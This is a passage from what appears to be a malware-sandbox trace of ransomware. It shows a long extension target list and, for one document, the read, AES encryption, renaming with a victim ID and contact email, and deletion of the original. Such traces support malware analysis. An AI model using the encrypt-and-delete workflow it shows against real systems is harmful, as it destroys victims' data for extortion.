sk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.604] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.604] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.604] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.608] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x13e56, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x13e56, lpOverlapped=0x0) returned 1
	[0189.612] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.612] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0189.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.614] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.614] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.615] CryptHashData (hHash=0xfb9070, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.615] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9070, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91b0) returned 1
	[0189.615] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.615] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x13e56, dwBufLen=0x13e56 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x13e60) returned 1
	[0189.617] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.618] RtlMoveMemory (in: Destination=0xff0fe0, Source=0xfdd180, Length=0x13e56 | out: Destination=0xff0fe0) 
	[0189.618] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.618] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff0fe0*, pdwDataLen=0x18a1ec*=0x13e56, dwBufLen=0x13e60 | out: pbData=0xff0fe0*, pdwDataLen=0x18a1ec*=0x13e60) returned 1
	[0189.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.620] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0189.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.620] CryptDestroyHash (hHash=0xfb9070) returned 1
	[0189.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.620] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0189.620] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.621] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.621] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.622] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 137
	[0189.622] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.623] WriteFile (in: hFile=0x390, lpBuffer=0xff0fe0*, nNumberOfBytesToWrite=0x13e60, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xff0fe0*, lpNumberOfBytesWritten=0x18a648*=0x13e60, lpOverlapped=0x0) returned 1
	[0189.629] CloseHandle (hObject=0x390) returned 1
	[0189.630] CloseHandle (hObject=0x388) returned 1
	[0189.630] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx")) returned 1
	[0189.637] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\xvbk0emv3rdkqgynq3.docx")) returned 0
	[0189.637] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4aa00, ftCreationTime.dwHighDateTime=0x1d97490, ftLastAccessTime.dwLowDateTime=0x62d8a0b0, ftLastAccessTime.dwHighDateTime=0x1d97622, ftLastWriteTime.dwLowDateTime=0x62d8a0b0, ftLastWriteTime.dwHighDateTime=0x1d97622, nFileSizeHigh=0x0, nFileSizeLow=0x1343d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z0IoRK9q93YMj.csv", cAlternateFileName="Z0IORK~1.CSV")) returned 1
	[0189.637] lstrcmpW (lpString1="Z0IoRK9q93YMj.csv", lpString2="..") returned 1
	[0189.637] lstrcmpW (lpString1="Z0IoRK9q93YMj.csv", lpString2=".") returned 1
	[0189.637] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.637] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="Z0IoRK9q93YMj.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Z0IoRK9q93YMj.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Z0IoRK9q93YMj.csv"
	[0189.638] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Z0IoRK9q93YMj.csv") returned 89
	[0189.638] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.638] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\Z0IoRK9q93YMj.csv", cchLength=0x59 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv") returned 0x59
	[0189.638] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.638] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.638] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv"
	[0189.638] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\z0iork9q93ymj.csv") returned 89
	[0189.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.639] StrStrW (lpFirst=".csv", lpSrch=".") returned=".csv"
	[0189.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.639] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.